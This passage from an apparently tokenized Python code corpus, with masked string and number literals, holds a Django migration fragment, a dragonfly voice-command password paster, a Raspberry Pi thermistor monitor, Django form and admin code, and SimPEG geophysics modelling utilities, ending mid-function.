BooleanField ( verbose_name = '<STR_LIT>' , default = False , help_text = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ManyToManyField ( related_name = '<STR_LIT>' , verbose_name = '<STR_LIT>' , blank = True , to = '<STR_LIT>' , related_query_name = '<STR_LIT:user>' , help_text = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> from dragonfly import ( Grammar , MappingRule , Key , Config , Section , Item , Text , Dictation ) <EOL> from dragonfly . windows . clipboard import Clipboard <EOL> class PasswordRule ( MappingRule ) : <EOL> name = "<STR_LIT>" <EOL> mapping = { <EOL> "<STR_LIT>" : Text ( '<STR_LIT>' ) , <EOL> } <EOL> extras = [ <EOL> Dictation ( "<STR_LIT:text>" , format = False ) , <EOL> ] <EOL> def _process_recognition ( self , value , extras ) : <EOL> getPassword = Key ( "<STR_LIT>" ) + value + Key ( '<STR_LIT>' ) <EOL> getPassword . execute ( ) <EOL> clipboard = Clipboard ( ) <EOL> clipboard . copy_from_system ( clear = True ) <EOL> password = clipboard . get_text ( ) <EOL> action = Text ( password ) <EOL> action . execute ( ) <EOL> grammar = Grammar ( "<STR_LIT>" ) <EOL> grammar . add_rule ( PasswordRule ( ) ) <EOL> grammar . load ( ) <EOL> def unload ( ) : <EOL> global grammar <EOL> if grammar : grammar . unload ( ) <EOL> grammar = None </s>
<s> from Tkinter import * <EOL> import RPi . GPIO as GPIO <EOL> import time , math <EOL> C = <NUM_LIT> <EOL> R1 = <NUM_LIT:1000> <EOL> B = <NUM_LIT> <EOL> R0 = <NUM_LIT> <EOL> GPIO . setmode ( GPIO . BCM ) <EOL> a_pin = <NUM_LIT> <EOL> b_pin = <NUM_LIT> <EOL> buzzer_pin = <NUM_LIT> <EOL> GPIO . setup ( buzzer_pin , GPIO . OUT ) <EOL> set_temp = <NUM_LIT> <EOL> def discharge ( ) : <EOL> GPIO . setup ( a_pin , GPIO . IN ) <EOL> GPIO . setup ( b_pin , GPIO . OUT ) <EOL> GPIO . output ( b_pin , False ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> def charge_time ( ) : <EOL> GPIO . setup ( b_pin , GPIO . IN ) <EOL> GPIO . setup ( a_pin , GPIO . OUT ) <EOL> GPIO . output ( a_pin , True ) <EOL> t1 = time . time ( ) <EOL> while not GPIO . input ( b_pin ) : <EOL> pass <EOL> t2 = time . time ( ) <EOL> return ( t2 - t1 ) * <NUM_LIT> <EOL> def analog_read ( ) : <EOL> discharge ( ) <EOL> t = charge_time ( ) <EOL> discharge ( ) <EOL> return t <EOL> def read_resistance ( ) : <EOL> n = <NUM_LIT:10> <EOL> total = <NUM_LIT:0> ; <EOL> for i in range ( <NUM_LIT:0> , n ) : <EOL> total = total + analog_read ( ) <EOL> t = total / float ( n ) <EOL> T = t * <NUM_LIT> * <NUM_LIT> <EOL> r = ( T / C ) - R1 <EOL> return r <EOL> def read_temp_c ( ) : <EOL> R = read_resistance ( ) <EOL> t0 = <NUM_LIT> <EOL> t25 = t0 + <NUM_LIT> <EOL> inv_T = <NUM_LIT:1> / t25 + <NUM_LIT:1> / B * math . log ( R / R0 ) <EOL> T = ( <NUM_LIT:1> / inv_T - t0 ) <EOL> return T <EOL> def buzz ( pitch , duration ) : <EOL> period = <NUM_LIT:1.0> / pitch <EOL> delay = period / <NUM_LIT:2> <EOL> cycles = int ( duration * pitch ) <EOL> for i in range ( cycles ) : <EOL> GPIO . output ( buzzer_pin , True ) <EOL> time . sleep ( delay ) <EOL> GPIO . output ( buzzer_pin , False ) <EOL> time . sleep ( delay ) <EOL> class App : <EOL> def __init__ ( self , master ) : <EOL> self . master = master <EOL> frame = Frame ( master ) <EOL> frame . 
pack ( ) <EOL> label = Label ( frame , text = '<STR_LIT>' , font = ( "<STR_LIT>" , <NUM_LIT:32> ) ) <EOL> label . grid ( row = <NUM_LIT:0> ) <EOL> self . reading_label = Label ( frame , text = '<STR_LIT>' , font = ( "<STR_LIT>" , <NUM_LIT> ) ) <EOL> self . reading_label . grid ( row = <NUM_LIT:1> ) <EOL> self . update_reading ( ) <EOL> def update_reading ( self ) : <EOL> temp_c = read_temp_c ( ) <EOL> temp_f = temp_c * <NUM_LIT> / <NUM_LIT> + <NUM_LIT> <EOL> if temp_c > set_temp : <EOL> buzz ( <NUM_LIT> , <NUM_LIT> ) <EOL> reading_str = "<STR_LIT>" . format ( temp_f ) <EOL> self . reading_label . configure ( text = reading_str ) <EOL> self . master . after ( <NUM_LIT> , self . update_reading ) <EOL> root = Tk ( ) <EOL> root . wm_title ( '<STR_LIT>' ) <EOL> app = App ( root ) <EOL> root . geometry ( "<STR_LIT>" ) <EOL> try : <EOL> root . mainloop ( ) <EOL> finally : <EOL> print ( "<STR_LIT>" ) <EOL> GPIO . cleanup ( ) </s>
<s> from django import forms <EOL> from django . contrib . auth . models import User <EOL> from django . utils . translation import ugettext as _ <EOL> from django . conf import settings <EOL> import re <EOL> username_re = re . compile ( '<STR_LIT>' ) <EOL> class RegistrationForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> username = forms . CharField ( label = _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:30> ) <EOL> password1 = forms . CharField ( label = _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:16> , widget = forms . PasswordInput ) <EOL> password2 = forms . CharField ( label = _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:16> , widget = forms . PasswordInput ) <EOL> def clean_username ( self ) : <EOL> username = self . cleaned_data . get ( "<STR_LIT:username>" ) . lower ( ) <EOL> if username in getattr ( settings , '<STR_LIT>' , [ ] ) : <EOL> raise forms . ValidationError ( _ ( <EOL> '<STR_LIT>' <EOL> ) ) <EOL> try : <EOL> User . objects . get ( username = username ) <EOL> except User . DoesNotExist : <EOL> if not username_re . match ( username ) : <EOL> raise forms . ValidationError ( _ ( <EOL> "<STR_LIT>" <EOL> ) ) <EOL> return username <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> def clean ( self ) : <EOL> if '<STR_LIT>' in self . cleaned_data and '<STR_LIT>' in self . cleaned_data : <EOL> if self . cleaned_data [ '<STR_LIT>' ] != self . cleaned_data [ '<STR_LIT>' ] : <EOL> raise forms . ValidationError ( _ ( u'<STR_LIT>' ) ) <EOL> return self . cleaned_data <EOL> def save ( self , request , profile_cb = None ) : <EOL> args = [ <EOL> self . cleaned_data [ "<STR_LIT:username>" ] , <EOL> self . cleaned_data [ "<STR_LIT:username>" ] + '<STR_LIT>' , <EOL> self . cleaned_data [ "<STR_LIT>" ] <EOL> ] <EOL> user = User . objects . create_user ( * args ) <EOL> if profile_cb is not None : <EOL> profile_cb ( user ) <EOL> return user , self . cleaned_data [ "<STR_LIT>" ] </s>
<s> from django . contrib import admin <EOL> from django . utils . safestring import mark_safe <EOL> from models import SourceImage , CropSize , CroppedImage <EOL> admin . site . register ( SourceImage ) <EOL> admin . site . register ( CropSize ) <EOL> class CroppedImageAdmin ( admin . ModelAdmin ) : <EOL> change_form_template = '<STR_LIT>' <EOL> def get_form ( self , request , obj = None , ** kwargs ) : <EOL> if obj is None : <EOL> fields = ( '<STR_LIT:source>' , '<STR_LIT:size>' ) <EOL> else : <EOL> fields = ( '<STR_LIT:source>' , '<STR_LIT:size>' , '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:w>' , '<STR_LIT:h>' ) <EOL> kwargs [ '<STR_LIT>' ] = fields <EOL> return super ( CroppedImageAdmin , self ) . get_form ( request , obj , ** kwargs ) <EOL> def preview_thumb ( self , obj ) : <EOL> if obj . image : <EOL> return mark_safe ( <EOL> u'<STR_LIT>' % obj . image . url <EOL> ) <EOL> else : <EOL> return None <EOL> preview_thumb . allow_tags = True <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT:size>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT:size>' , ) <EOL> admin . site . register ( CroppedImage , CroppedImageAdmin ) </s>
<s> from BaseDC import * <EOL> from BaseIP import * <EOL> from DCIPUtils import * <EOL> import Utils </s>
<s> from SimPEG import * <EOL> from SimPEG . FLOW import Richards <EOL> def run ( plotIt = True ) : <EOL> """<STR_LIT>""" <EOL> M = Mesh . TensorMesh ( [ np . ones ( <NUM_LIT> ) ] ) <EOL> M . setCellGradBC ( '<STR_LIT>' ) <EOL> params = Richards . Empirical . HaverkampParams ( ) . celia1990 <EOL> params [ '<STR_LIT>' ] = np . log ( params [ '<STR_LIT>' ] ) <EOL> E = Richards . Empirical . Haverkamp ( M , ** params ) <EOL> bc = np . array ( [ - <NUM_LIT> , - <NUM_LIT> ] ) <EOL> h = np . zeros ( M . nC ) + bc [ <NUM_LIT:0> ] <EOL> def getFields ( timeStep , method ) : <EOL> timeSteps = np . ones ( <NUM_LIT> / timeStep ) * timeStep <EOL> prob = Richards . RichardsProblem ( M , mapping = E , timeSteps = timeSteps , <EOL> boundaryConditions = bc , initialConditions = h , <EOL> doNewton = False , method = method ) <EOL> return prob . fields ( params [ '<STR_LIT>' ] ) <EOL> Hs_M10 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> Hs_M30 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> Hs_M120 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> Hs_H10 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> Hs_H30 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> Hs_H120 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> if not plotIt : return <EOL> import matplotlib . pyplot as plt <EOL> plt . figure ( figsize = ( <NUM_LIT> , <NUM_LIT:5> ) ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_M10 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_M30 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_M120 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . ylim ( [ - <NUM_LIT> , - <NUM_LIT:10> ] ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . ylabel ( '<STR_LIT>' ) <EOL> plt . legend ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_H10 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . plot ( <NUM_LIT> - M . 
gridCC , Hs_H30 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_H120 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . ylim ( [ - <NUM_LIT> , - <NUM_LIT:10> ] ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . ylabel ( '<STR_LIT>' ) <EOL> plt . legend ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> plt . show ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run ( ) </s>
<s> import numpy as np , SimPEG as simpeg <EOL> from scipy . constants import mu_0 , epsilon_0 as eps_0 <EOL> def getEHfields ( m1d , sigma , freq , zd , scaleUD = True ) : <EOL> '''<STR_LIT>''' <EOL> mu = mu_0 * np . ones ( ( m1d . nC + <NUM_LIT:1> ) ) <EOL> eps = eps_0 * np . ones ( ( m1d . nC + <NUM_LIT:1> ) ) <EOL> w = <NUM_LIT:2> * np . pi * freq <EOL> sig = np . concatenate ( ( np . array ( [ sigma [ <NUM_LIT:0> ] ] ) , sigma ) ) <EOL> k = np . sqrt ( eps * mu * w ** <NUM_LIT:2> - <NUM_LIT> * mu * sig * w ) <EOL> UDp = np . zeros ( ( <NUM_LIT:2> , m1d . nC + <NUM_LIT:1> ) , dtype = complex ) <EOL> UDp [ <NUM_LIT:1> , <NUM_LIT:0> ] = <NUM_LIT:1.> <EOL> for lnr , h in enumerate ( m1d . hx ) : <EOL> yp1 = k [ lnr ] / ( w * mu [ lnr ] ) <EOL> zp = ( w * mu [ lnr + <NUM_LIT:1> ] ) / k [ lnr + <NUM_LIT:1> ] <EOL> Pj1 = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ yp1 , - yp1 ] ] ) <EOL> Pjinv = <NUM_LIT:1.> / <NUM_LIT:2> * np . array ( [ [ <NUM_LIT:1> , zp ] , [ <NUM_LIT:1> , - zp ] ] ) <EOL> elamh = np . array ( [ [ np . exp ( - <NUM_LIT> * k [ lnr + <NUM_LIT:1> ] * h ) , <NUM_LIT:0> ] , [ <NUM_LIT:0> , np . exp ( <NUM_LIT> * k [ lnr + <NUM_LIT:1> ] * h ) ] ] ) <EOL> UDp [ : , lnr + <NUM_LIT:1> ] = elamh . dot ( Pjinv . dot ( Pj1 ) ) . dot ( UDp [ : , lnr ] ) <EOL> if scaleUD : <EOL> UDp [ : , lnr + <NUM_LIT:1> : : - <NUM_LIT:1> ] = UDp [ : , lnr + <NUM_LIT:1> : : - <NUM_LIT:1> ] / UDp [ <NUM_LIT:1> , lnr + <NUM_LIT:1> ] <EOL> Ed = np . empty ( ( zd . size , ) , dtype = complex ) <EOL> Eu = np . empty ( ( zd . size , ) , dtype = complex ) <EOL> Hd = np . empty ( ( zd . size , ) , dtype = complex ) <EOL> Hu = np . empty ( ( zd . size , ) , dtype = complex ) <EOL> dup = m1d . vectorNx [ <NUM_LIT:0> ] <EOL> dind = dup >= zd <EOL> Ed [ dind ] = UDp [ <NUM_LIT:1> , <NUM_LIT:0> ] * np . exp ( - <NUM_LIT> * k [ <NUM_LIT:0> ] * ( dup - zd [ dind ] ) ) <EOL> Eu [ dind ] = UDp [ <NUM_LIT:0> , <NUM_LIT:0> ] * np . 
exp ( <NUM_LIT> * k [ <NUM_LIT:0> ] * ( dup - zd [ dind ] ) ) <EOL> Hd [ dind ] = ( k [ <NUM_LIT:0> ] / ( w * mu [ <NUM_LIT:0> ] ) ) * UDp [ <NUM_LIT:1> , <NUM_LIT:0> ] * np . exp ( - <NUM_LIT> * k [ <NUM_LIT:0> ] * ( dup - zd [ dind ] ) ) <EOL> Hu [ dind ] = - ( k [ <NUM_LIT:0> ] / ( w * mu [ <NUM_LIT:0> ] ) ) * UDp [ <NUM_LIT:0> , <NUM_LIT:0> ] * np . exp ( <NUM_LIT> * k [ <NUM_LIT:0> ] * ( dup - zd [ dind ] ) ) <EOL> for ki , mui , epsi , dlow , dup , Up , Dp in zip ( k [ <NUM_LIT:1> : : ] , mu [ <NUM_LIT:1> : : ] , eps [ <NUM_LIT:1> : : ] , m1d . vectorNx [ : - <NUM_LIT:1> ] , m1d . vectorNx [ <NUM_LIT:1> : : ] , UDp [ <NUM_LIT:0> , <NUM_LIT:1> : : ] , UDp [ <NUM_LIT:1> , <NUM_LIT:1> : : ] ) : <EOL> dind = np . logical_and ( dup >= zd , zd > dlow ) <EOL> Ed [ dind ] = Dp * np . exp ( - <NUM_LIT> * ki * ( dup - zd [ dind ] ) ) <EOL> Eu [ dind ] = Up * np . exp ( <NUM_LIT> * ki * ( dup - zd [ dind ] ) ) <EOL> Hd [ dind ] = ( ki / ( w * mui ) ) * Dp * np . exp ( - <NUM_LIT> * ki * ( dup - zd [ dind ] ) ) <EOL> Hu [ dind ] = - ( ki / ( w * mui ) ) * Up * np . exp ( <NUM_LIT> * ki * ( dup - zd [ dind ] ) ) <EOL> return Ed , Eu , Hd , Hu <EOL> def getImpedance ( m1d , sigma , freq ) : <EOL> """<STR_LIT>""" <EOL> Z1d = np . empty ( len ( freq ) , dtype = '<STR_LIT>' ) <EOL> h = m1d . hx <EOL> for nrFr , fr in enumerate ( freq ) : <EOL> om = <NUM_LIT:2> * np . pi * fr <EOL> Zall = np . empty ( len ( h ) + <NUM_LIT:1> , dtype = '<STR_LIT>' ) <EOL> Zall [ <NUM_LIT:0> ] = ( mu_0 * om ) / np . sqrt ( mu_0 * eps_0 * ( om ) ** <NUM_LIT:2> - <NUM_LIT> * mu_0 * sigma [ <NUM_LIT:0> ] * om ) <EOL> for nr , hi in enumerate ( h ) : <EOL> k = np . sqrt ( mu_0 * eps_0 * om ** <NUM_LIT:2> - <NUM_LIT> * mu_0 * sigma [ nr ] * om ) <EOL> Z = ( mu_0 * om ) / k <EOL> Zall [ nr + <NUM_LIT:1> ] = Z * ( ( Zall [ nr ] + Z * np . tanh ( <NUM_LIT> * k * hi ) ) / ( Z + Zall [ nr ] * np . tanh ( <NUM_LIT> * k * hi ) ) ) <EOL> Z1d [ nrFr ] = Zall [ - <NUM_LIT:1> ] <EOL> return Z1d </s>
<s> import numpy as np <EOL> import scipy . ndimage as ndi <EOL> import scipy . sparse as sp <EOL> from matutils import mkvc <EOL> def addBlock ( gridCC , modelCC , p0 , p1 , blockProp ) : <EOL> """<STR_LIT>""" <EOL> ind = getIndicesBlock ( p0 , p1 , gridCC ) <EOL> modelBlock = modelCC . copy ( ) <EOL> modelBlock [ ind ] = blockProp <EOL> return modelBlock <EOL> def getIndicesBlock ( p0 , p1 , ccMesh ) : <EOL> """<STR_LIT>""" <EOL> assert len ( p0 ) == len ( p1 ) , "<STR_LIT>" <EOL> dimMesh = np . size ( ccMesh [ <NUM_LIT:0> , : ] ) <EOL> assert len ( p0 ) == dimMesh , "<STR_LIT>" <EOL> for ii in range ( len ( p0 ) ) : <EOL> p0 [ ii ] , p1 [ ii ] = np . min ( [ p0 [ ii ] , p1 [ ii ] ] ) , np . max ( [ p0 [ ii ] , p1 [ ii ] ] ) <EOL> if dimMesh == <NUM_LIT:1> : <EOL> x1 = p0 [ <NUM_LIT:0> ] <EOL> x2 = p1 [ <NUM_LIT:0> ] <EOL> indX = ( x1 <= ccMesh [ : , <NUM_LIT:0> ] ) & ( ccMesh [ : , <NUM_LIT:0> ] <= x2 ) <EOL> ind = np . where ( indX ) <EOL> elif dimMesh == <NUM_LIT:2> : <EOL> x1 = p0 [ <NUM_LIT:0> ] <EOL> y1 = p0 [ <NUM_LIT:1> ] <EOL> x2 = p1 [ <NUM_LIT:0> ] <EOL> y2 = p1 [ <NUM_LIT:1> ] <EOL> indX = ( x1 <= ccMesh [ : , <NUM_LIT:0> ] ) & ( ccMesh [ : , <NUM_LIT:0> ] <= x2 ) <EOL> indY = ( y1 <= ccMesh [ : , <NUM_LIT:1> ] ) & ( ccMesh [ : , <NUM_LIT:1> ] <= y2 ) <EOL> ind = np . where ( indX & indY ) <EOL> elif dimMesh == <NUM_LIT:3> : <EOL> x1 = p0 [ <NUM_LIT:0> ] <EOL> y1 = p0 [ <NUM_LIT:1> ] <EOL> z1 = p0 [ <NUM_LIT:2> ] <EOL> x2 = p1 [ <NUM_LIT:0> ] <EOL> y2 = p1 [ <NUM_LIT:1> ] <EOL> z2 = p1 [ <NUM_LIT:2> ] <EOL> indX = ( x1 <= ccMesh [ : , <NUM_LIT:0> ] ) & ( ccMesh [ : , <NUM_LIT:0> ] <= x2 ) <EOL> indY = ( y1 <= ccMesh [ : , <NUM_LIT:1> ] ) & ( ccMesh [ : , <NUM_LIT:1> ] <= y2 ) <EOL> indZ = ( z1 <= ccMesh [ : , <NUM_LIT:2> ] ) & ( ccMesh [ : , <NUM_LIT:2> ] <= z2 ) <EOL> ind = np . where ( indX & indY & indZ ) <EOL> return ind <EOL> def defineBlock ( ccMesh , p0 , p1 , vals = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) : <EOL> """<STR_LIT>""" <EOL> sigma = np . 
zeros ( ccMesh . shape [ <NUM_LIT:0> ] ) + vals [ <NUM_LIT:1> ] <EOL> ind = getIndicesBlock ( p0 , p1 , ccMesh ) <EOL> sigma [ ind ] = vals [ <NUM_LIT:0> ] <EOL> return mkvc ( sigma ) <EOL> def defineElipse ( ccMesh , center = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , anisotropy = [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , slope = <NUM_LIT> , theta = <NUM_LIT:0.> ) : <EOL> G = ccMesh . copy ( ) <EOL> dim = ccMesh . shape [ <NUM_LIT:1> ] <EOL> for i in range ( dim ) : <EOL> G [ : , i ] = G [ : , i ] - center [ i ] <EOL> theta = - theta * np . pi / <NUM_LIT> <EOL> M = np . array ( [ [ np . cos ( theta ) , - np . sin ( theta ) , <NUM_LIT:0> ] , [ np . sin ( theta ) , np . cos ( theta ) , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1.> ] ] ) <EOL> M = M [ : dim , : dim ] <EOL> G = M . dot ( G . T ) . T <EOL> for i in range ( dim ) : <EOL> G [ : , i ] = G [ : , i ] / anisotropy [ i ] * <NUM_LIT> <EOL> D = np . sqrt ( np . sum ( G ** <NUM_LIT:2> , axis = <NUM_LIT:1> ) ) <EOL> return - np . arctan ( ( D - <NUM_LIT:1> ) * slope ) * ( <NUM_LIT> / np . pi ) / <NUM_LIT> + <NUM_LIT:0.5> <EOL> def getIndicesSphere ( center , radius , ccMesh ) : <EOL> """<STR_LIT>""" <EOL> dimMesh = np . size ( ccMesh [ <NUM_LIT:0> , : ] ) <EOL> assert len ( center ) == dimMesh , "<STR_LIT>" <EOL> if dimMesh == <NUM_LIT:1> : <EOL> ind = np . abs ( center [ <NUM_LIT:0> ] - ccMesh [ : , <NUM_LIT:0> ] ) < radius <EOL> elif dimMesh == <NUM_LIT:2> : <EOL> ind = np . sqrt ( ( center [ <NUM_LIT:0> ] - ccMesh [ : , <NUM_LIT:0> ] ) ** <NUM_LIT:2> + ( center [ <NUM_LIT:1> ] - ccMesh [ : , <NUM_LIT:1> ] ) ** <NUM_LIT:2> ) < radius <EOL> elif dimMesh == <NUM_LIT:3> : <EOL> ind = np . 
sqrt ( ( center [ <NUM_LIT:0> ] - ccMesh [ : , <NUM_LIT:0> ] ) ** <NUM_LIT:2> + ( center [ <NUM_LIT:1> ] - ccMesh [ : , <NUM_LIT:1> ] ) ** <NUM_LIT:2> + ( center [ <NUM_LIT:2> ] - ccMesh [ : , <NUM_LIT:2> ] ) ** <NUM_LIT:2> ) < radius <EOL> return ind <EOL> def defineTwoLayers ( ccMesh , depth , vals = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) : <EOL> """<STR_LIT>""" <EOL> sigma = np . zeros ( ccMesh . shape [ <NUM_LIT:0> ] ) + vals [ <NUM_LIT:1> ] <EOL> dim = np . size ( ccMesh [ <NUM_LIT:0> , : ] ) <EOL> p0 = np . zeros ( dim ) <EOL> p1 = np . zeros ( dim ) <EOL> p0 [ <NUM_LIT:0> ] = ccMesh [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> if dim > <NUM_LIT:1> : p0 [ <NUM_LIT:1> ] = ccMesh [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> if dim > <NUM_LIT:2> : p0 [ <NUM_LIT:2> ] = ccMesh [ <NUM_LIT:0> , <NUM_LIT:2> ] <EOL> p1 [ <NUM_LIT:0> ] = ccMesh [ - <NUM_LIT:1> , <NUM_LIT:0> ] <EOL> if dim > <NUM_LIT:1> : p1 [ <NUM_LIT:1> ] = ccMesh [ - <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> if dim > <NUM_LIT:2> : p1 [ <NUM_LIT:2> ] = ccMesh [ - <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> p1 [ len ( p1 ) - <NUM_LIT:1> ] -= depth <EOL> ind = getIndicesBlock ( p0 , p1 , ccMesh ) <EOL> sigma [ ind ] = vals [ <NUM_LIT:0> ] ; <EOL> return mkvc ( sigma ) <EOL> def scalarConductivity ( ccMesh , pFunction ) : <EOL> """<STR_LIT>""" <EOL> dim = np . size ( ccMesh [ <NUM_LIT:0> , : ] ) <EOL> CC = [ ccMesh [ : , <NUM_LIT:0> ] ] <EOL> if dim > <NUM_LIT:1> : CC . append ( ccMesh [ : , <NUM_LIT:1> ] ) <EOL> if dim > <NUM_LIT:2> : CC . append ( ccMesh [ : , <NUM_LIT:2> ] ) <EOL> sigma = pFunction ( * CC ) <EOL> return mkvc ( sigma ) <EOL> def layeredModel ( ccMesh , layerTops , layerValues ) : <EOL> """<STR_LIT>""" <EOL> descending = np . linalg . norm ( sorted ( layerTops , reverse = True ) - layerTops ) < <NUM_LIT> <EOL> if not descending : <EOL> zprop = np . hstack ( [ mkvc ( layerTops , <NUM_LIT:2> ) , mkvc ( layerValues , <NUM_LIT:2> ) ] ) <EOL> zprop . 
sort ( axis = <NUM_LIT:0> ) <EOL> layerTops , layerValues = zprop [ : : - <NUM_LIT:1> , <NUM_LIT:0> ] , zprop [ : : - <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> layerTops , layerValues = mkvc ( layerTops ) , mkvc ( layerValues ) <EOL> dim = ccMesh . shape [ <NUM_LIT:1> ] <EOL> if dim == <NUM_LIT:3> : <EOL> z = ccMesh [ : , <NUM_LIT:2> ] <EOL> elif dim == <NUM_LIT:2> : <EOL> z = ccMesh [ : , <NUM_LIT:1> ] <EOL> elif dim == <NUM_LIT:1> : <EOL> z = ccMesh [ : , <NUM_LIT:0> ] <EOL> model = np . zeros ( ccMesh . shape [ <NUM_LIT:0> ] ) <EOL> for i , top in enumerate ( layerTops ) : <EOL> zind = z <= top <EOL> model [ zind ] = layerValues [ i ] <EOL> return model <EOL> def randomModel ( shape , seed = None , anisotropy = None , its = <NUM_LIT:100> , bounds = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) : <EOL> """<STR_LIT>""" <EOL> if seed is None : <EOL> seed = np . random . randint ( <NUM_LIT> ) <EOL> print '<STR_LIT>' , seed <EOL> if type ( shape ) in [ int , long , float ] : <EOL> shape = ( shape , ) <EOL> np . random . seed ( seed ) <EOL> mr = np . random . rand ( * shape ) <EOL> if anisotropy is None : <EOL> if len ( shape ) is <NUM_LIT:1> : <EOL> smth = np . array ( [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> ] , dtype = float ) <EOL> elif len ( shape ) is <NUM_LIT:2> : <EOL> smth = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:10> , <NUM_LIT:2> ] , [ <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:1> ] ] , dtype = float ) <EOL> elif len ( shape ) is <NUM_LIT:3> : <EOL> kernal = np . array ( [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:1> ] , dtype = float ) . reshape ( ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> smth = np . array ( sp . kron ( sp . kron ( kernal , kernal . T ) . todense ( ) [ : ] , kernal ) . todense ( ) ) . reshape ( ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> else : <EOL> assert len ( anisotropy . shape ) is len ( shape ) , '<STR_LIT>' <EOL> smth = np . array ( anisotropy , dtype = float ) <EOL> smth = smth / smth . 
sum ( ) <EOL> mi = mr <EOL> for i in range ( its ) : <EOL> mi = ndi . convolve ( mi , smth ) <EOL> mi = ( mi - mi . min ( ) ) / ( mi . max ( ) - mi . min ( ) ) <EOL> mi = mi * ( bounds [ <NUM_LIT:1> ] - bounds [ <NUM_LIT:0> ] ) + bounds [ <NUM_LIT:0> ] <EOL> return mi <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from SimPEG . Mesh import TensorMesh <EOL> from matplotlib import pyplot as plt <EOL> testDim = <NUM_LIT:2> <EOL> h1 = <NUM_LIT> * np . ones ( <NUM_LIT:7> ) <EOL> h1 [ <NUM_LIT:0> ] = <NUM_LIT:0.5> <EOL> h1 [ - <NUM_LIT:1> ] = <NUM_LIT> <EOL> h2 = <NUM_LIT> * np . ones ( <NUM_LIT:4> ) <EOL> h3 = <NUM_LIT> * np . ones ( <NUM_LIT:6> ) <EOL> x0 = np . zeros ( <NUM_LIT:3> ) <EOL> if testDim == <NUM_LIT:1> : <EOL> h = [ h1 ] <EOL> x0 = x0 [ <NUM_LIT:0> ] <EOL> elif testDim == <NUM_LIT:2> : <EOL> h = [ h1 , h2 ] <EOL> x0 = x0 [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> else : <EOL> h = [ h1 , h2 , h3 ] <EOL> M = TensorMesh ( h , x0 ) <EOL> ccMesh = M . gridCC <EOL> print ( '<STR_LIT>' ) <EOL> p0 = np . array ( [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ] ) [ : testDim ] <EOL> p1 = np . array ( [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) [ : testDim ] <EOL> vals = np . array ( [ <NUM_LIT:100> , <NUM_LIT> ] ) <EOL> sigma = defineBlockConductivity ( ccMesh , p0 , p1 , vals ) <EOL> print sigma . shape <EOL> M . plotImage ( sigma ) <EOL> print '<STR_LIT>' <EOL> plt . show ( ) <EOL> print ( '<STR_LIT>' ) <EOL> vals = np . array ( [ <NUM_LIT:100> , <NUM_LIT> ] ) ; <EOL> depth = <NUM_LIT:1.0> ; <EOL> sigma = defineTwoLayeredConductivity ( ccMesh , depth , vals ) <EOL> M . plotImage ( sigma ) <EOL> print sigma <EOL> print '<STR_LIT>' <EOL> plt . show ( ) <EOL> print ( '<STR_LIT>' ) <EOL> if testDim == <NUM_LIT:1> : <EOL> pFunction = lambda x : np . exp ( x ) <EOL> elif testDim == <NUM_LIT:2> : 